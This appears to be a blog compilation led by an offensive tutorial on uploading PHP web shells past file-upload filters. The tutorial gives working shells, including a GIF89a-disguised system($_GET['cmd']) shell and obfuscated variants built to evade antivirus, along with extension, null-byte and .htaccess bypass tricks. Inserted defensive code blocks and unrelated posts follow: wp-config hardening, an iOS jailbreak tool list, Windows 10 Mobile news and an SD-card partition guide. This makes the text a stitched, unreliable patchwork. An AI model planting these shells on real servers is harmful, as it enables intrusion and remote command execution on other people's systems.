SHELL UPLOAD METHOD BY Zenodermus Javanicus


Here is the content I am going to discuss in this tutorial.

1. Client Side Filters Bypass
  • Disable JavaScript in the browser.
  • HTTP Live Headers to replay the tampered request.
  • Tamper Data Firefox addon.
  • Proxify the application and tamper the request.
2. Bypassing Content-Type Verification
  • Change Content-Type using request modification.
  • Fool the server side check using a GIF89a; header.
  • Inject your payload in image metadata/comments.
3. Bypassing the Extension Black Listing
  • Try other executable extensions.
  • Bypass case sensitive filter.
  • Idiotic regex filter bypass.
  • Add shell to executable using .htaccess file.
4. Bypassing the Extension White Listing
  • Null byte injection
  • Bypass using double extension
  • Invalid extension bypass
5. Bypassing the Content Length and Malicious Script Checks
  • Content length bypass
  • Malicious script checks bypass
6. Upload Shell using SQLi
7. Shell Upload Bypass using LFI

    First of all, I hope you know the basics of what a shell is and how to upload and use one, so keeping all that aside we'll concentrate on shell upload bypasses here:

    1. Client Side Filters Bypass

    First of all, let us be clear about what client side filters are. Client side filters are browser based filters, or in other words JavaScript that validates the type of file we are uploading. If the file doesn't seem valid, it gives an error. Everything is fine up to here, but the problem with such JavaScript based security is that it depends entirely on the browser, and an attacker can tamper with the request before it reaches the server. Here are some of the tricks an attacker can play to bypass such security:

    1. Disable JavaScript in the browser.
    2. HTTP Live Headers to replay the tampered request.
    3. Tamper data using firefox addon.
    4. Proxify the application and tamper the request.
    All of the above are the same type of bypass, and knowing even one of them will work for you, so I will use the last approach in this tutorial. It is really simple: set up the Burp proxy with your browser and the game starts. I will show you the basic steps to use Burp.

    Step 1: Open your Burp proxy and make sure it is listening on port 8080.

    Step 2: Configure Firefox to send its traffic via localhost port 8080: go to Tools->Options->Advanced->Network->Settings and make the changes shown in the image.

    You have successfully redirected the traffic via Burp. Now go to the Proxy->Intercept tab and turn interception on if it is off, so that you can change the request content before it reaches the server.

    Now let's say there is a website where you are trying to upload a shell and it shows an error that you can only upload image files. Simply rename your shell.php to shell.php.jpg and upload the file. When you click submit, the request will pass through Burp. Change the filename back to shell.php and, if there is no check on the server side, you will get your shell uploaded.

    2. Bypassing Content-Type Verification

    1. Change Content-Type using request modification.
    2. Fool the server side check using a GIF89a; header.
    3. Inject your payload in image metadata/comments.

    Change Content-Type using request modification.
    Many times developers rely on the request's Content-Type: the upload script checks the Content-Type and only accepts the file if it is an image type. The problem here again is that the Content-Type header can be changed before it reaches the server. As you can see in the image, the content type is "application/octet-stream"; change it to "image/gif" and hope that works for you.

    Fool the server side check using a GIF89a; header
    Sometimes a server side content signature check can be fooled by putting a "GIF89a;" header at the start of your shell. Here is an example:
    GIF89a;
    <?
    system($_GET['cmd']);//or you can insert your complete shell code
    ?>
    

    Inject your payload in image metadata/comments
    There are a lot of tricks we can do with our image file; one of them is injecting the payload into the metadata header using exiftool, or you can use a tool named "edjpgcom.exe". Run "edjpgcom.exe yourimagefilename.jpg" on the command line to add a comment to your image.

    3. Bypassing the Extension Black Listing

    Sometimes developers use a blacklisting approach against shell uploading. The problem with blacklisting is always the same: you always forget to block something, or a new bypass may fuck your security. It is the same here. Let's say a developer is filtering php files from being uploaded to the server. We have a number of ways to bypass it.

    1. Try other executable extensions.
    2. Bypass Case Sensitive Filter.
    3. Idiotic Regex filter bypass.
    4. Add shell to executable using .htaccess file.
    Try other executable extensions.
    First, there are multiple PHP extensions which the developer might have forgotten, so we can rename our file to:
    shell.php1
    shell.php2
    shell.php4
    shell.php5
    shell.phtml

    We can even try executing a Perl shell with the extension .pl or .cgi.

    Bypass case sensitive filter.
    If all of these are nicely blacklisted, we can still change the case to see whether the filter is case sensitive or not. In simple words, try out:
    shell.PhP
    shell.Php1
    shell.PhP2
    shell.pHP2
    shell.pHp4
    shell.PHp5
    shell.PhtMl


    Idiotic regex filter bypass.
    Occasionally you come across a file extension check done with a regex, and such cases can suffer from a bad regex. The programmer might have written a regex which only checks for the presence of ".jpg" somewhere in the filename, so it can be bypassed using a double extension like shell.jpg.php and so on.

    Add shell to executable using .htaccess file.
    But if we are fucking unlucky and none of the above extensions work, we still have one good chance of getting a shell on the website using a .htaccess file.

    A .htaccess file is a per-directory configuration file for the Apache server. Using one of its settings we can change how a file type is handled. Now let's choose a file extension which is not blacklisted; one of my favourites in such cases is the .shell extension. So here is the .htaccess configuration: copy it into a .htaccess file, upload it into the folder, then upload your PHP shell with the name shell.shell and boom!! it will execute.
    AddType application/x-httpd-php .shell
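    As an added defensive example (not part of the tutorial), the server-side counter to the .htaccess trick above: Apache directives for the upload directory, placed in the vhost or server config so that an uploaded .htaccess cannot override them. The directory path is a placeholder, php_admin_flag applies only when PHP runs as mod_php (drop it with php-fpm), and Require needs Apache 2.4.

```apache
# Added example, not from the tutorial. Path below is a placeholder.
<Directory "/var/www/html/uploads">
    # Ignore any .htaccess an attacker manages to upload (AddType, AddHandler, ...)
    AllowOverride None

    # Serve every file in this tree as static content, whatever its extension
    SetHandler default-handler
    Options -ExecCGI -Includes

    # mod_php only: switch the PHP engine off for this tree entirely
    <IfModule mod_php.c>
        php_admin_flag engine off
    </IfModule>

    # Refuse to serve dot-files (.htaccess, .user.ini) at all
    <FilesMatch "^\.">
        Require all denied
    </FilesMatch>
</Directory>
```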
    
    4. Bypassing the Extension White Listing

    In some cases developers use extension whitelisting; bypassing such security usually depends on the web server or the language. This is the case where the developer does not allow any extension other than a few whitelisted ones. For example, if it is an image upload function then only jpg, jpeg, gif, png, bmp etc. are allowed. We can try the following tricks:

    1. Null Byte Injection
    2. Bypass using Double Extension
    3. Invalid Extension Bypass
    Null byte injection
    Our first trick is null byte injection: sometimes when we submit a filename like shell.php.jpg with a null byte placed after .php, the part after the null byte is dropped by the language and the file gets saved with the name shell.php.

    Bypass using double extension
    In such cases we can use shell.php.jpg, shell.php:.jpg or shell.php;.jpg. Sometimes this leads to shell execution, but it is usually a web server or OS based bypass, so we can't really blame the programmer in such cases. Leaving the uploaded filenames unchanged is still a bad programming practice, though.

    Invalid extension bypass
    Here is another server side trick: sometimes when we use an extension like .test which is not recognised by the server, the first extension is used instead, so we can try uploading shell.php.test.
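    As an added defensive example (not code from the tutorial), a PHP upload handler that closes the gaps described in sections 1 to 4: it ignores the client's filename and Content-Type, whitelists extensions case-insensitively, rejects multi-dot and null-byte names, sniffs the real content, and re-encodes the image through GD so a GIF89a text stub or a payload hidden in metadata does not survive. It assumes the GD and fileinfo extensions, PHP 8, and a storage directory outside the document root (STORE_DIR is a placeholder).

```php
<?php
// Added example, not from the tutorial. Assumes GD, fileinfo and PHP 8;
// STORE_DIR is a placeholder path that is NOT under the web root.
declare(strict_types=1);

const ALLOWED = [               // extension => MIME type finfo must report
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];
const MAX_BYTES = 2 * 1024 * 1024;
const STORE_DIR = '/var/app/uploads';   // placeholder, outside the web root

// Validates one $_FILES entry and returns the whitelisted extension.
// The client-supplied name and Content-Type header are treated as hints only.
function validate_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }
    if ($file['size'] === 0 || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('bad size');
    }
    // Section 4: exactly one dot, no null bytes or separator characters, so
    // shell.php.jpg, shell.php%00.jpg and shell.php;.jpg never get further.
    $name = (string) $file['name'];
    if (strpbrk($name, "\0;:/\\") !== false || substr_count($name, '.') !== 1) {
        throw new RuntimeException('bad filename');
    }
    // Section 3: case-insensitive comparison against a whitelist, not a blacklist.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // Section 2: ignore the request Content-Type; sniff the bytes on disk.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content is $mime, not " . ALLOWED[$ext]);
    }
    return $ext;
}

// Re-encodes the image through GD and stores it under a random name.
// A "GIF89a;" text stub fails to decode, and re-encoding drops EXIF and
// comment segments, so a payload hidden there (section 2) is discarded.
function store_upload(array $file): string
{
    $ext = validate_upload($file);
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('not a decodable image');
    }
    // Section 1: never reuse the client name; random name, fixed extension.
    $dest = STORE_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    $ok = match ($ext) {
        'jpg', 'jpeg' => imagejpeg($img, $dest, 85),
        'png'         => imagepng($img, $dest),
        'gif'         => imagegif($img, $dest),   // animation is not preserved
    };
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    chmod($dest, 0640);   // readable by the application, never executable
    return $dest;
}

try {
    echo 'stored ', store_upload($_FILES['image'] ?? []), PHP_EOL;
} catch (RuntimeException $e) {
    http_response_code(400);
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

    Serve the stored files through a download script or a static handler that sets the Content-Type itself, never by exposing STORE_DIR directly.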

    5. Bypassing the Content Length and Malicious Script Checks

    Content length bypass
    Sometimes we face a content length check, which is not that common, but we know there is no end to human stupidity. Keeping that in mind, there are some very easy ways to bypass such checks. If the server only accepts very small files, here is the smallest shell code you can use:
    <?system($_GET[0]);
    
    Now for the other case, a check that rejects files below a certain size: the bypass is padding the file to make it larger. I don't think I need to tell you how; obviously you can insert a lot of junk into your file.

    Malicious script checks bypass
    Many times we successfully upload a shell to a server, but when we try to access it we find it has already been removed. This is usually because some AV or other script is checking for malicious files on the server and deleting them. We can deal with such shit easily, but I am writing this for those who don't know how to handle it. Here we need some basic coding knowledge, or else some copy/paste may do. Here are some shell scripts which work in such situations:
    Shell-1: you can execute it like "shell.php?0=system&1=ls"
    <?
    @$_[]=@! _; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((  $__) ($__   ))].=$_;
    $_[]=  $__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__ $__)  $_[$__-$__]).($__ $__ $__) $_[$__-$__];
    $_[$__ $__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
    $_[$__ $__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
    $_[$__ $__] .=($_[$__][$__ $__])^$_[$__][($__<<$__)-$__ ];
    $_=$ 
    $_[$__  $__] ;$_[@-_]($_[@! _] );
    ?>
    
    shell-2: You can execute it like "shell.php?_=system&__=ls"
    <?php
    $_="{"; 
    $_=($_^"<").($_^">;").($_^"/");
    ?>
    <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
    
    We can even upload our own PHP scripts and do some basic operations with them. You can also use a PHP reverse connection shell, which comes in handy, and catch the reverse connection using netcat.
How To Protect Wp-config.php file So You Don't Get Hacked

    Today we will try to protect our wp-config.php file. As we know, wp-config.php contains very sensitive information about your WordPress installation: database access, table prefix and secret keys.

    The wp-config.php file is a standard part of a WordPress installation.
    Now the question is how we protect it.
    You certainly don't want this file falling into the wrong hands.


    How to protect your WordPress wp-config.php file:
    I will tell you two basic methods which will protect your wp-config.php file.
    First I will tell you how to protect it through the .htaccess file.
    1. Download your .htaccess file from the server. It is located in the same directory as your wp-config.php or index.php file. (If you don't have an .htaccess file, then you will need to create one.)
    2. Using a text editor, like Notepad, open your .htaccess file.
    3. Copy and paste the following code into your .htaccess file to deny access to your wp-config.php file. The <Files> wrapper limits the rule to wp-config.php only; without it the deny would apply to the whole directory.
    # protect wp-config.php
    <Files wp-config.php>
    order allow,deny
    deny from all
    </Files>
    The second method I am telling you guys about is protecting wp-config by moving its sensitive contents to an unpredictable location.
    Say, for example, the web root path for your server is /home/Name/public_html/.
    You can save a file in the /home/Name/ area and it won't be web accessible. This means that even if somebody were able to read your wp-config, they wouldn't get anything valuable.
    First step
    Create a "config.php".
    Within this config.php file I included the following:
    <?php
    define('DB_NAME', 'your_db_name'); // The name of the database
    define('DB_USER', 'your_db_username'); // Your MySQL username
    define('DB_PASSWORD', 'your_db_pass'); // DB Password
    define('DB_HOST', 'localhost'); // Localhost
    $table_prefix = 'yourdbprefix_'; // Only numbers, letters, and underscores please!
    ?>
    Upload this file to a location that is not readable over the web. Normally this is the directory above "public_html" or "www".
    Modify the wp-config
    Then modify the "wp-config.php" file to include that file. If somebody were somehow able to read the contents of my wp-config, all they would see is this:

    <?php
    // Pull the database credentials from the file outside the web root
    include('/home/Name/config.php');
    // Change this to localize WordPress. A corresponding MO file for the
    // chosen language must be installed to wp-includes/languages.
    // For example, install de.mo to wp-includes/languages and set WPLANG to 'de'
    // to enable German language support.
    define ('WPLANG', '');
    /* That's all, stop editing! Happy blogging. */
    define('ABSPATH', dirname(__FILE__).'/');
    require_once(ABSPATH.'wp-settings.php');
    ?>
    Hopefully you get the idea. Save your sensitive information in a non-WWW location, and have the WP-Config file read it in. This way you won’t have to change anything if you have to upgrade WordPress.

    This tutorial is not mine; the author is kind of my big brother and a lot better than me :)

    Jailbreak

    What is Jailbreaking: iOS jailbreaking is the process of removing the limitations on Apple devices running the iOS operating system through the use of software and hardware exploits – such devices include the iPhone, iPod touch, iPad, and second generation Apple TV. Jailbreaking permits root access to the iOS operating system, allowing the download of additional applications, extensions, and themes that are unavailable through the official Apple App Store.


    TaiG Jailbreak Tool

    Early this month, Apple released iOS 8.1.3. Some users have successfully upgraded to the newest system version, while for now there is no untethered jailbreak method for iOS 8.1.3. As said, the TaiG Jailbreak Team has already completed untethered jailbreak support for iOS 8.2. Recently, Apple released the iOS 8.2 beta 5 version, which means the official iOS 8.2 will come soon.

    Announcing the TaiG Jailbreak Tool for iOS 8.2 beta 1&2 on Windows. To those who have already upgraded to iOS 8.1.3, we suggest upgrading to iOS 8.2 beta 1&2 using the TaiG Firmware Upgrade Tool, and then using the TaiG Jailbreak Tool to jailbreak your device.
    Downloads: v1.3.0 for iOS 8.2 Beta 2; v1.2.1 for iOS 8.0-8.1.2

    Pangu: Jailbreak your iOS device for the latest iOS 8 and iOS 8.1. Pangu jailbreak (iOS 8) version 1.0 is ready as a jailbreak developer version. Available for iPod Touch, iPhone 4S, iPhone 5/5C/5S, iPhone 6/6 Plus, iPad Mini 2/3, iPad/iPad Air/Air 2. Download

    evasi0n - iOS 7 Jailbreak: Download evasi0n for iOS 7 for Mac OS X & Windows

    Pangu: Jailbreak iOS 7.1 and iOS 7.1.1. The untethered jailbreak is compatible with iPhone 5s, iPhone 5c, iPhone 4S, iPhone 4, iPad Air, iPad 4, iPad 3, iPad 2, iPad mini, Retina iPad mini and iPod touch 5G running iOS 7.1-7.1.1. Download

    Redsn0w: Redsn0w version 0.9.15b1, with significant new features supporting restoring to older firmware no longer being signed by Apple. For brevity, we'll list most of the new features in bullet form. Features:
    • restore from any 5.x iOS to any other (up, down or the same) 5.x iOS on all devices as long as you have the correct blobs (see more below)
    • Cydia now included in the tethered 6.0 jailbreak on A4 devices
    • automatically “Just Boot” tethered when qualifying A4 device connects in DFU mode
    • untethered 6.0 jailbreak on old-bootrom 3GS
    • untethered 6.0 hactivation on any 3GS or iPhone4
    • directly restore pre-A5 devices to earlier firmware — no more complicated 15-step how-to’s with stitching, iTunes errors, and “hosts file” concerns
    • fetch new signed blobs for any IPSW (present or future — no redsn0w update required) using Extras->SHSH Blobs->New
    • block the BB update for any 3GS or iPhone4 restore (past, present, or future — no redsn0w update required) using Extras->Even More->Restore
    • deactivate any iPhone, useful for testing your “official” unlock status through iTunes.  (Please only deactivate your own iPhone!)
    • activation status shown on “Even more” page
    • significantly more (very nerdy) info returned by “Identify” button when device is in Normal mode
    • tethered jailbreak of ATV2 supported (but the only thing available for it is the SSH2 custom bundle available here — no Cydia yet.  Must use “Select IPSW” for tethered boot of ATV2 for now).
    • auto-exit WTF mode for older devices with broken buttons
    • any time a set of blobs is fetched remotely (from Apple or Cydia), redsn0w also saves them locally (and will check there first if you click “Local”)
    Read more. Downloads: redsn0w 0.9.15b3 (OS X, use Ctrl-Click->Open if on Mountain Lion for now); redsn0w 0.9.15b3 (Windows, run in Administrator mode)

    evasi0n - iOS 6.0-6.1.2 Jailbreak: Compatible with all iPhone, iPod touch, iPad and iPad mini models running iOS 6.0 through 6.1.2. Requirements:
    • A computer running Windows (XP minimum), Mac OS X (10.6 minimum) or Linux (x86 / x86_64)
    • An iPhone, iPad or iPod running iOS 6.0 through 6.1.2 (you may check in Settings / General / About => Version)
    • A USB cable to connect the device to the computer

    Windows 10 Mobile Launch

    Looks like Windows 10 Mobile will make the holiday season.


    Lumia 950 ship date


    Between the launch date of the Microsoft Lumia 950XL and comments made by Microsoft’s official Lumia Facebook account, we now know when Microsoft’s Windows 10 Mobile will roll out.


    Microsoft said Tuesday that the company plans to launch its new Lumia 950XL and Lumia 950 "in November," according to a slide shown during Microsoft's launch event. Microsoft exhibited those phones running Windows 10 Mobile (which Microsoft sometimes simply calls Windows 10), and they're expected to ship with what is presumed to be the final version of the OS.


    On Wednesday and again on Thursday, Microsoft took to its Facebook page to clarify the dates on which older phones could receive Windows 10.


    “Windows 10 is available on PCs and tablets now, and while Lumia 950 and Lumia 950 XL ship with Windows 10 for phones, broad availability of Windows 10 on other devices, including mobile phones, will begin rolling out in December,” the official Lumia account wrote.


    Why this matters: With just a tiny fraction of the smartphone market, Microsoft needs to convince consumers to upgrade, and the combination of the new Lumia phones and its latest smartphone OS is the most potent option it has. As Brad Sams at Thurrott.com noted, however, it’s possible that customers with older Windows Phone devices will simply choose to upgrade to the latest phones instead.

    A delay?

    The notion of an official release date for almost any software is fast becoming an anachronism. Microsoft has continued to release preview builds to the public, and will presumably continue to do so after the Windows 10 Mobile launch occurs.

    However you define the process, Windows 10 Mobile's rollout is proving a bit slower than originally expected. Microsoft’s Joe Belfiore has said previously that users should expect a flood of new Windows 10 launches during this fall. An earlier report pegged the Windows 10 Mobile launch during the third quarter, although that was never confirmed.

    Early versions of the Windows 10 Mobile Preview builds have been buggy and slow, although they’ve improved over time. The latest builds haven’t been all that bad.

    Still, it was probably smart of Microsoft to launch the new Lumia 950 phones (as well as the Lumia 550) in advance of the upgrade. Those who are desperate to buy the new hardware will sink a few hundred dollars into them, converting them into evangelists for the OS—and making the free upgrade to the Windows 10 Mobile OS for older Windows Phone users all the more interminable.

    How to make partition in SD card and make more space in Internal Storage




    Hey all,
    Some days ago my friend Jay complained to me about the internal storage on her NOTE 2...
    This is the solution. Read carefully.

    Before buying a phone, all of us first check the features of the phone, which include its
    camera, processor, RAM, screen size... etc. And we also don't forget to check its internal storage!!
    Most of you must have rejected a phone because it doesn't have sufficient internal storage!!
    But today we have come up with a trick with the help of which you can:
    1) Ease the burden on the internal storage of the device.
    2) Resolve the issue of low internal memory space on your mobile devices, especially smartphones or tablets.
    3) Have your apps installed on the SD card by default.
    Does it mean that we will increase the internal storage capacity?
    The answer is a big NO. We will create a partition on the SD card so that the apps that usually get installed in phone memory will be installed on your SD card by default, giving you free internal space!



    Lets Get started:

    Note:Don't forget to backup all your micro SD data!



    1)Partitioning of SD card.



    1.1) Download the tool

     First, you have to download the tool, in this article we will use the minitool partition wizard, then install it on your PC / laptop.

    1.2) How to use the Tool

    1. Make sure that your phone's USB connection mode is Mass Storage mode. Now connect your phone to the PC.

    2. Run the MiniTool Partition Wizard on your PC, choose Basic/Disk 2, then right click and choose Move/Resize just like the image below.



    3. In this section we will create the first partition, which can be used for storing things like music, movies and files. This partition needs the bigger share of the storage, say between 75% and 95% or even more of the total microSD capacity. You can set the capacity by sliding the right edge of the bar, just like the image below. Click OK after that.


    Allocate space


    4. Then we will use the rest of the storage capacity (whatever you left free above) for the second partition. Look at the picture below: right click on the unallocated space, then choose Create. If a popup appears after clicking Create, just click "Yes".


    Unallocated space


    5. Look at the image below. For the "File System" section, set it to Ext2, and for the "Create As" section, set it to Primary, then click OK.

    2nd partition


    6. When you're done, click Apply. But make sure that you have set the right file systems (FAT32 for the first partition and Ext2 for the second), and that both are created as primary.

    A popup will now appear asking you to close all other apps on your PC (except this one), and not to use the power saver / battery saver mode on your PC / laptop, before clicking OK.
    Wait until the partitioning is done.


    2) Using Link2SD


    First of all, let me tell you what exactly Link2SD does.
    This app is very useful for Android users with small internal storage capacity.
    Link2SD can be used to move the data of applications that are usually installed in phone memory to the partition we created in the step above. Link2SD forcibly moves the entire user app and all of its data to the SD card, including the dalvik-cache files and lib files (apk + data).

    The other special feature of this app is that Link2SD can be used to remove system apps (bloatware), which is very helpful for saving more space in the device's internal storage.


    Note: You have to root your Android device before you can use the main feature. Make sure that your microSD card has been partitioned; see step 1 above to create the partition on the SD card.


    2.1) Download the tool

    Download Link2SD, which is easily available on the Play Store.

    2.2) How to use the Tool

    1. Run the app (Link2SD) from the device's menu. If the app requests SuperUser access (like the image below), select "Allow".
    INSTALLING LINK2SD


    2. On the first run, if you have partitioned your SD card, the app will show a popup with options. Choose the one matching the file system of your SD card's 2nd partition, restart your device, and re-launch Link2SD after restarting. If an "error mount script" warning appears, you have to re-partition your SD card; I suggest changing the file system of the SD card's 2nd partition (if you used ext2 before, use ext3 / ext4 / FAT32 when re-partitioning).

    FIRST RUN

    3. If that went well, choose the apps that you want to move to the SD card's 2nd partition. Tap the soft key (capacitive button or "option" key), choose the multi-select option, and then either select all or choose apps manually one by one. Choose Actions after that.

    LINKING APPS


    4. After selecting Actions, a popup will open with many options; just select the Create Link option.

    create link

    5. Tick all the options, then click OK.


    tick all





    6. After moving all the apps to SD card, you can check the memory status on your Device.

    see sys info

    As you can see in the image above, the total app data that has been moved to the SD card's second partition is shown in the white circle.

    That's it... Now you will have lots of free internal memory!!


    Uninstalling / removing system app with Link2SD


    1) Select the app you want to uninstall and then choose action.

    unintall app

    2) Select Uninstall

    uninstall

    3) Link2SD will then show a warning message to confirm the removal; read it carefully. If you're sure, simply click OK.